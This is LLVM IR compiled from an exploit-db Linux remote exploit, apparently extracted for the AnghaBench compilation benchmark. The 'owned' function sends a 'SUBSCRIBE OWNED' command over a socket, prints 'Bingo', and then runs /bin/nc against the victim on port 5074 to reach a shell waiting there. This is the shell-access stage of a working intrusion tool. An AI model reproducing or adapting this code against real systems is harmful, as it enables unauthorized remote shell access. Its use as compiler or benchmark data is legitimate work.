; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_1209.c_owned.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_1209.c_owned.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@b = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [19 x i8] c"3 SUBSCRIBE OWNED\0A\00", align 1
@.str.1 = private unnamed_addr constant [11 x i8] c"[-] send()\00", align 1
@.str.2 = private unnamed_addr constant [12 x i8] c"[+] Bingo.\0A\00", align 1
@.str.3 = private unnamed_addr constant [8 x i8] c"/bin/nc\00", align 1
@.str.4 = private unnamed_addr constant [6 x i8] c"prout\00", align 1
@.str.5 = private unnamed_addr constant [5 x i8] c"5074\00", align 1
@.str.6 = private unnamed_addr constant [62 x i8] c"[-] muh? where is nc?\0A[+] A shell is waiting you on %s:5074.\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @owned(i32 %0, i8* %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i8*, align 8
  store i32 %0, i32* %3, align 4
  store i8* %1, i8** %4, align 8
  %5 = load i32, i32* @b, align 4
  %6 = call i32 @memset(i32 %5, i32 0, i32 1024)
  %7 = load i32, i32* @b, align 4
  %8 = call i32 @snprintf(i32 %7, i32 1023, i8* getelementptr inbounds ([19 x i8], [19 x i8]* @.str, i64 0, i64 0))
  %9 = load i32, i32* %3, align 4
  %10 = load i32, i32* @b, align 4
  %11 = load i32, i32* @b, align 4
  %12 = call i32 @strlen(i32 %11)
  %13 = call i32 @send(i32 %9, i32 %10, i32 %12, i32 0)
  %14 = icmp eq i32 %13, -1
  br i1 %14, label %15, label %18

15:                                               ; preds = %2
  %16 = call i32 @perror(i8* getelementptr inbounds ([11 x i8], [11 x i8]* @.str.1, i64 0, i64 0))
  %17 = call i32 @exit(i32 1) #3
  unreachable

18:                                               ; preds = %2
  %19 = call i32 @puts(i8* getelementptr inbounds ([12 x i8], [12 x i8]* @.str.2, i64 0, i64 0))
  %20 = call i32 @sleep(i32 1)
  %21 = load i8*, i8** %4, align 8
  %22 = call i32 @execl(i8* getelementptr inbounds ([8 x i8], [8 x i8]* @.str.3, i64 0, i64 0), i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.4, i64 0, i64 0), i8* %21, i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str.5, i64 0, i64 0), i32* null)
  %23 = load i8*, i8** %4, align 8
  %24 = call i32 @printf(i8* getelementptr inbounds ([62 x i8], [62 x i8]* @.str.6, i64 0, i64 0), i8* %23)
  ret void
}

declare dso_local i32 @memset(i32, i32, i32) #1

declare dso_local i32 @snprintf(i32, i32, i8*) #1

declare dso_local i32 @send(i32, i32, i32, i32) #1

declare dso_local i32 @strlen(i32) #1

declare dso_local i32 @perror(i8*) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i32 @puts(i8*) #1

declare dso_local i32 @sleep(i32) #1

declare dso_local i32 @execl(i8*, i8*, i8*, i8*, i32*) #1

declare dso_local i32 @printf(i8*, i8*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
